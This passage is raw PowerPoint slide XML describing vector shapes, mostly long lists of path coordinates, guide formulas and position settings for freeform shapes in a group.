                    <a:pt x="5098" y="1821"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5013" y="1764"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4929" y="1701"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4851" y="1637"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4772" y="1569"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4698" y="1496"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4625" y="1422"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4557" y="1343"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4493" y="1265"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4430" y="1181"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4373" y="1096"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4320" y="1008"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4268" y="913"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4220" y="819"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4179" y="724"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4142" y="629"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4105" y="525"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4073" y="425"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4053" y="320"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4032" y="215"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4016" y="110"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4000" y="0"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="4657" y="3916"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="4657" y="3916"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4625" y="3953"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4583" y="3984"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4583" y="3984"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4536" y="4005"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4509" y="4011"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4483" y="4011"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2084" y="4011"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2084" y="4011"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2058" y="4011"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2031" y="4005"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2010" y="3995"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1984" y="3984"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1984" y="3984"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1963" y="3969"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1942" y="3953"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1926" y="3937"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1916" y="3916"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1916" y="3916"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1889" y="3864"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1884" y="3837"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1884" y="3816"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1884" y="3790"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1889" y="3764"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1900" y="3743"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1911" y="3717"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3107" y="1517"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3107" y="1517"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3124" y="1496"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3139" y="1475"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3160" y="1454"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3181" y="1438"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3181" y="1438"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3207" y="1427"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3234" y="1417"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3260" y="1412"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3286" y="1412"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3286" y="1412"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3312" y="1412"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3338" y="1417"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3365" y="1427"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3386" y="1438"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3386" y="1438"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3407" y="1454"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3428" y="1475"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3459" y="1517"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4661" y="3717"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4661" y="3717"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4672" y="3743"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4683" y="3764"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4683" y="3790"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4687" y="3816"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4683" y="3837"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4677" y="3864"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4657" y="3916"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="5192" y="7202"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="5596" y="6499"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5995" y="7202"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5192" y="7202"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="3496" y="2231"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="3496" y="2231"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3475" y="2215"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3459" y="2210"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3113" y="2210"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3113" y="2210"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3097" y="2215"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3076" y="2231"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3076" y="2231"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3066" y="2241"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3060" y="2262"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3087" y="2976"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3087" y="2976"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3092" y="2992"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3102" y="3003"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3102" y="3003"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3118" y="3008"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3139" y="3013"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3428" y="3013"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3428" y="3013"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3448" y="3008"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3465" y="3003"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3465" y="3003"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3475" y="2992"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3480" y="2976"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3512" y="2257"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3512" y="2257"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3507" y="2241"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3496" y="223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425" name="Group 424"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="2904517" y="4301925"/>
              <a:ext cx="1098959" cy="1286814"/>
              <a:chOff x="2414588" y="4352925"/>
              <a:chExt cx="1671637" cy="1957388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426" name="Freeform 70"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2414588" y="4352925"/>
                <a:ext cx="268287" cy="174625"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 709 w 746"/>
                  <a:gd name="T1" fmla="*/ 126 h 484"/>
                  <a:gd name="T2" fmla="*/ 745 w 746"/>
                  <a:gd name="T3" fmla="*/ 273 h 484"/>
                  <a:gd name="T4" fmla="*/ 294 w 746"/>
                  <a:gd name="T5" fmla="*/ 388 h 484"/>
                  <a:gd name="T6" fmla="*/ 310 w 746"/>
                  <a:gd name="T7" fmla="*/ 456 h 484"/>
                  <a:gd name="T8" fmla="*/ 200 w 746"/>
                  <a:gd name="T9" fmla="*/ 483 h 484"/>
                  <a:gd name="T10" fmla="*/ 179 w 746"/>
                  <a:gd name="T11" fmla="*/ 415 h 484"/>
                  <a:gd name="T12" fmla="*/ 32 w 746"/>
                  <a:gd name="T13" fmla="*/ 451 h 484"/>
                  <a:gd name="T14" fmla="*/ 0 w 746"/>
                  <a:gd name="T15" fmla="*/ 320 h 484"/>
                  <a:gd name="T16" fmla="*/ 147 w 746"/>
                  <a:gd name="T17" fmla="*/ 283 h 484"/>
                  <a:gd name="T18" fmla="*/ 84 w 746"/>
                  <a:gd name="T19" fmla="*/ 26 h 484"/>
                  <a:gd name="T20" fmla="*/ 205 w 746"/>
                  <a:gd name="T21" fmla="*/ 0 h 484"/>
                  <a:gd name="T22" fmla="*/ 709 w 746"/>
                  <a:gd name="T23" fmla="*/ 126 h 484"/>
                  <a:gd name="T24" fmla="*/ 530 w 746"/>
                  <a:gd name="T25" fmla="*/ 184 h 484"/>
                  <a:gd name="T26" fmla="*/ 226 w 746"/>
                  <a:gd name="T27" fmla="*/ 115 h 484"/>
                  <a:gd name="T28" fmla="*/ 263 w 746"/>
                  <a:gd name="T29" fmla="*/ 252 h 484"/>
                  <a:gd name="T30" fmla="*/ 530 w 746"/>
                  <a:gd name="T31" fmla="*/ 188 h 484"/>
                  <a:gd name="T32" fmla="*/ 530 w 746"/>
                  <a:gd name="T33" fmla="*/ 184 h 4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46" h="484">
                    <a:moveTo>
                      <a:pt x="709" y="126"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="745" y="273"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="294" y="388"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="310" y="456"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="200" y="483"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="179" y="415"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="32" y="451"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="320"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="147" y="283"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="84" y="26"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="205" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="709" y="126"/>
                    </a:lnTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="530" y="184"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="226" y="115"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="263" y="252"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="530" y="188"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="530" y="184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27" name="Freeform 71"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2443163" y="4557713"/>
                <a:ext cx="69850" cy="65087"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 42 w 195"/>
                  <a:gd name="T1" fmla="*/ 178 h 179"/>
                  <a:gd name="T2" fmla="*/ 0 w 195"/>
                  <a:gd name="T3" fmla="*/ 47 h 179"/>
                  <a:gd name="T4" fmla="*/ 157 w 195"/>
                  <a:gd name="T5" fmla="*/ 0 h 179"/>
                  <a:gd name="T6" fmla="*/ 194 w 195"/>
                  <a:gd name="T7" fmla="*/ 131 h 179"/>
                  <a:gd name="T8" fmla="*/ 42 w 195"/>
                  <a:gd name="T9" fmla="*/ 178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5" h="179">
                    <a:moveTo>
                      <a:pt x="42" y="178"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="0" y="47"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="157" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="194" y="131"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="42" y="178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8" name="Freeform 72"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2520950" y="4641850"/>
                <a:ext cx="296863" cy="220663"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 215 w 825"/>
                  <a:gd name="T1" fmla="*/ 451 h 615"/>
                  <a:gd name="T2" fmla="*/ 215 w 825"/>
                  <a:gd name="T3" fmla="*/ 457 h 615"/>
                  <a:gd name="T4" fmla="*/ 767 w 825"/>
                  <a:gd name="T5" fmla="*/ 352 h 615"/>
                  <a:gd name="T6" fmla="*/ 824 w 825"/>
                  <a:gd name="T7" fmla="*/ 494 h 615"/>
                  <a:gd name="T8" fmla="*/ 73 w 825"/>
                  <a:gd name="T9" fmla="*/ 614 h 615"/>
                  <a:gd name="T10" fmla="*/ 0 w 825"/>
                  <a:gd name="T11" fmla="*/ 441 h 615"/>
                  <a:gd name="T12" fmla="*/ 624 w 825"/>
                  <a:gd name="T13" fmla="*/ 0 h 615"/>
                  <a:gd name="T14" fmla="*/ 682 w 825"/>
                  <a:gd name="T15" fmla="*/ 147 h 615"/>
                  <a:gd name="T16" fmla="*/ 215 w 825"/>
                  <a:gd name="T17" fmla="*/ 451 h 6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25" h="615">
                    <a:moveTo>
                      <a:pt x="215" y="451"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="215" y="457"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="767" y="352"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="824" y="494"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="73" y="614"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="441"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="624" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="682" y="147"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="215" y="451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9" name="Freeform 73"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2595563" y="4859338"/>
                <a:ext cx="238125" cy="227012"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 157 w 662"/>
                  <a:gd name="T1" fmla="*/ 478 h 631"/>
                  <a:gd name="T2" fmla="*/ 157 w 662"/>
                  <a:gd name="T3" fmla="*/ 478 h 631"/>
                  <a:gd name="T4" fmla="*/ 110 w 662"/>
                  <a:gd name="T5" fmla="*/ 472 h 631"/>
                  <a:gd name="T6" fmla="*/ 94 w 662"/>
                  <a:gd name="T7" fmla="*/ 461 h 631"/>
                  <a:gd name="T8" fmla="*/ 73 w 662"/>
                  <a:gd name="T9" fmla="*/ 451 h 631"/>
                  <a:gd name="T10" fmla="*/ 73 w 662"/>
                  <a:gd name="T11" fmla="*/ 451 h 631"/>
                  <a:gd name="T12" fmla="*/ 47 w 662"/>
                  <a:gd name="T13" fmla="*/ 425 h 631"/>
                  <a:gd name="T14" fmla="*/ 21 w 662"/>
                  <a:gd name="T15" fmla="*/ 383 h 631"/>
                  <a:gd name="T16" fmla="*/ 21 w 662"/>
                  <a:gd name="T17" fmla="*/ 383 h 631"/>
                  <a:gd name="T18" fmla="*/ 10 w 662"/>
                  <a:gd name="T19" fmla="*/ 357 h 631"/>
                  <a:gd name="T20" fmla="*/ 5 w 662"/>
                  <a:gd name="T21" fmla="*/ 325 h 631"/>
                  <a:gd name="T22" fmla="*/ 0 w 662"/>
                  <a:gd name="T23" fmla="*/ 299 h 631"/>
                  <a:gd name="T24" fmla="*/ 5 w 662"/>
                  <a:gd name="T25" fmla="*/ 273 h 631"/>
                  <a:gd name="T26" fmla="*/ 5 w 662"/>
                  <a:gd name="T27" fmla="*/ 273 h 631"/>
                  <a:gd name="T28" fmla="*/ 21 w 662"/>
                  <a:gd name="T29" fmla="*/ 252 h 631"/>
                  <a:gd name="T30" fmla="*/ 37 w 662"/>
                  <a:gd name="T31" fmla="*/ 231 h 631"/>
                  <a:gd name="T32" fmla="*/ 63 w 662"/>
                  <a:gd name="T33" fmla="*/ 210 h 631"/>
                  <a:gd name="T34" fmla="*/ 100 w 662"/>
                  <a:gd name="T35" fmla="*/ 189 h 631"/>
                  <a:gd name="T36" fmla="*/ 467 w 662"/>
                  <a:gd name="T37" fmla="*/ 0 h 631"/>
                  <a:gd name="T38" fmla="*/ 535 w 662"/>
                  <a:gd name="T39" fmla="*/ 131 h 631"/>
                  <a:gd name="T40" fmla="*/ 189 w 662"/>
                  <a:gd name="T41" fmla="*/ 304 h 631"/>
                  <a:gd name="T42" fmla="*/ 189 w 662"/>
                  <a:gd name="T43" fmla="*/ 304 h 631"/>
                  <a:gd name="T44" fmla="*/ 157 w 662"/>
                  <a:gd name="T45" fmla="*/ 325 h 631"/>
                  <a:gd name="T46" fmla="*/ 142 w 662"/>
                  <a:gd name="T47" fmla="*/ 341 h 631"/>
                  <a:gd name="T48" fmla="*/ 142 w 662"/>
                  <a:gd name="T49" fmla="*/ 341 h 631"/>
                  <a:gd name="T50" fmla="*/ 137 w 662"/>
                  <a:gd name="T51" fmla="*/ 367 h 631"/>
                  <a:gd name="T52" fmla="*/ 147 w 662"/>
                  <a:gd name="T53" fmla="*/ 394 h 631"/>
                  <a:gd name="T54" fmla="*/ 147 w 662"/>
                  <a:gd name="T55" fmla="*/ 394 h 631"/>
                  <a:gd name="T56" fmla="*/ 157 w 662"/>
                  <a:gd name="T57" fmla="*/ 409 h 631"/>
                  <a:gd name="T58" fmla="*/ 168 w 662"/>
                  <a:gd name="T59" fmla="*/ 420 h 631"/>
                  <a:gd name="T60" fmla="*/ 178 w 662"/>
                  <a:gd name="T61" fmla="*/ 431 h 631"/>
                  <a:gd name="T62" fmla="*/ 194 w 662"/>
                  <a:gd name="T63" fmla="*/ 435 h 631"/>
                  <a:gd name="T64" fmla="*/ 210 w 662"/>
                  <a:gd name="T65" fmla="*/ 435 h 631"/>
                  <a:gd name="T66" fmla="*/ 226 w 662"/>
                  <a:gd name="T67" fmla="*/ 435 h 631"/>
                  <a:gd name="T68" fmla="*/ 263 w 662"/>
                  <a:gd name="T69" fmla="*/ 420 h 631"/>
                  <a:gd name="T70" fmla="*/ 593 w 662"/>
                  <a:gd name="T71" fmla="*/ 252 h 631"/>
                  <a:gd name="T72" fmla="*/ 661 w 662"/>
                  <a:gd name="T73" fmla="*/ 383 h 631"/>
                  <a:gd name="T74" fmla="*/ 157 w 662"/>
                  <a:gd name="T75" fmla="*/ 630 h 631"/>
                  <a:gd name="T76" fmla="*/ 100 w 662"/>
                  <a:gd name="T77" fmla="*/ 509 h 631"/>
                  <a:gd name="T78" fmla="*/ 157 w 662"/>
                  <a:gd name="T79" fmla="*/ 478 h 6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62" h="631">
                    <a:moveTo>
                      <a:pt x="157" y="478"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="157" y="478"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="110" y="472"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="94" y="461"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="73" y="451"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="73" y="451"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="47" y="425"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="21" y="383"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="21" y="383"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10" y="357"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="325"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="299"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="273"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="273"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="21" y="252"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="37" y="231"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="63" y="210"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="100" y="189"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="467" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="535" y="131"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="189" y="304"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="189" y="304"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="157" y="325"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="142" y="341"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="142" y="341"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="137" y="367"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="147" y="394"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="147" y="394"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="157" y="409"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="168" y="420"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="178" y="431"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="194" y="435"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="210" y="435"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="226" y="435"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="263" y="420"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="593" y="252"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="661" y="383"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="157" y="630"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="100" y="509"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="157" y="478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30" name="Freeform 74"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2678113" y="4995863"/>
                <a:ext cx="257175" cy="177800"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 714 w 715"/>
                  <a:gd name="T1" fmla="*/ 120 h 495"/>
                  <a:gd name="T2" fmla="*/ 68 w 715"/>
                  <a:gd name="T3" fmla="*/ 494 h 495"/>
                  <a:gd name="T4" fmla="*/ 0 w 715"/>
                  <a:gd name="T5" fmla="*/ 367 h 495"/>
                  <a:gd name="T6" fmla="*/ 640 w 715"/>
                  <a:gd name="T7" fmla="*/ 0 h 495"/>
                  <a:gd name="T8" fmla="*/ 714 w 715"/>
                  <a:gd name="T9" fmla="*/ 120 h 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5" h="495">
                    <a:moveTo>
                      <a:pt x="714" y="120"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="68" y="494"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="367"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="640" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="714" y="12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31" name="Freeform 75"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2724150" y="5103813"/>
                <a:ext cx="239713" cy="238125"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 546 w 668"/>
                  <a:gd name="T1" fmla="*/ 115 h 663"/>
                  <a:gd name="T2" fmla="*/ 488 w 668"/>
                  <a:gd name="T3" fmla="*/ 152 h 663"/>
                  <a:gd name="T4" fmla="*/ 494 w 668"/>
                  <a:gd name="T5" fmla="*/ 152 h 663"/>
                  <a:gd name="T6" fmla="*/ 494 w 668"/>
                  <a:gd name="T7" fmla="*/ 152 h 663"/>
                  <a:gd name="T8" fmla="*/ 535 w 668"/>
                  <a:gd name="T9" fmla="*/ 152 h 663"/>
                  <a:gd name="T10" fmla="*/ 556 w 668"/>
                  <a:gd name="T11" fmla="*/ 163 h 663"/>
                  <a:gd name="T12" fmla="*/ 578 w 668"/>
                  <a:gd name="T13" fmla="*/ 168 h 663"/>
                  <a:gd name="T14" fmla="*/ 578 w 668"/>
                  <a:gd name="T15" fmla="*/ 168 h 663"/>
                  <a:gd name="T16" fmla="*/ 609 w 668"/>
                  <a:gd name="T17" fmla="*/ 195 h 663"/>
                  <a:gd name="T18" fmla="*/ 635 w 668"/>
                  <a:gd name="T19" fmla="*/ 225 h 663"/>
                  <a:gd name="T20" fmla="*/ 635 w 668"/>
                  <a:gd name="T21" fmla="*/ 225 h 663"/>
                  <a:gd name="T22" fmla="*/ 651 w 668"/>
                  <a:gd name="T23" fmla="*/ 257 h 663"/>
                  <a:gd name="T24" fmla="*/ 662 w 668"/>
                  <a:gd name="T25" fmla="*/ 284 h 663"/>
                  <a:gd name="T26" fmla="*/ 667 w 668"/>
                  <a:gd name="T27" fmla="*/ 310 h 663"/>
                  <a:gd name="T28" fmla="*/ 662 w 668"/>
                  <a:gd name="T29" fmla="*/ 336 h 663"/>
                  <a:gd name="T30" fmla="*/ 662 w 668"/>
                  <a:gd name="T31" fmla="*/ 336 h 663"/>
                  <a:gd name="T32" fmla="*/ 651 w 668"/>
                  <a:gd name="T33" fmla="*/ 362 h 663"/>
                  <a:gd name="T34" fmla="*/ 635 w 668"/>
                  <a:gd name="T35" fmla="*/ 389 h 663"/>
                  <a:gd name="T36" fmla="*/ 615 w 668"/>
                  <a:gd name="T37" fmla="*/ 409 h 663"/>
                  <a:gd name="T38" fmla="*/ 578 w 668"/>
                  <a:gd name="T39" fmla="*/ 436 h 663"/>
                  <a:gd name="T40" fmla="*/ 231 w 668"/>
                  <a:gd name="T41" fmla="*/ 662 h 663"/>
                  <a:gd name="T42" fmla="*/ 152 w 668"/>
                  <a:gd name="T43" fmla="*/ 541 h 663"/>
                  <a:gd name="T44" fmla="*/ 478 w 668"/>
                  <a:gd name="T45" fmla="*/ 331 h 663"/>
                  <a:gd name="T46" fmla="*/ 478 w 668"/>
                  <a:gd name="T47" fmla="*/ 331 h 663"/>
                  <a:gd name="T48" fmla="*/ 509 w 668"/>
                  <a:gd name="T49" fmla="*/ 305 h 663"/>
                  <a:gd name="T50" fmla="*/ 520 w 668"/>
                  <a:gd name="T51" fmla="*/ 284 h 663"/>
                  <a:gd name="T52" fmla="*/ 520 w 668"/>
                  <a:gd name="T53" fmla="*/ 284 h 663"/>
                  <a:gd name="T54" fmla="*/ 520 w 668"/>
                  <a:gd name="T55" fmla="*/ 262 h 663"/>
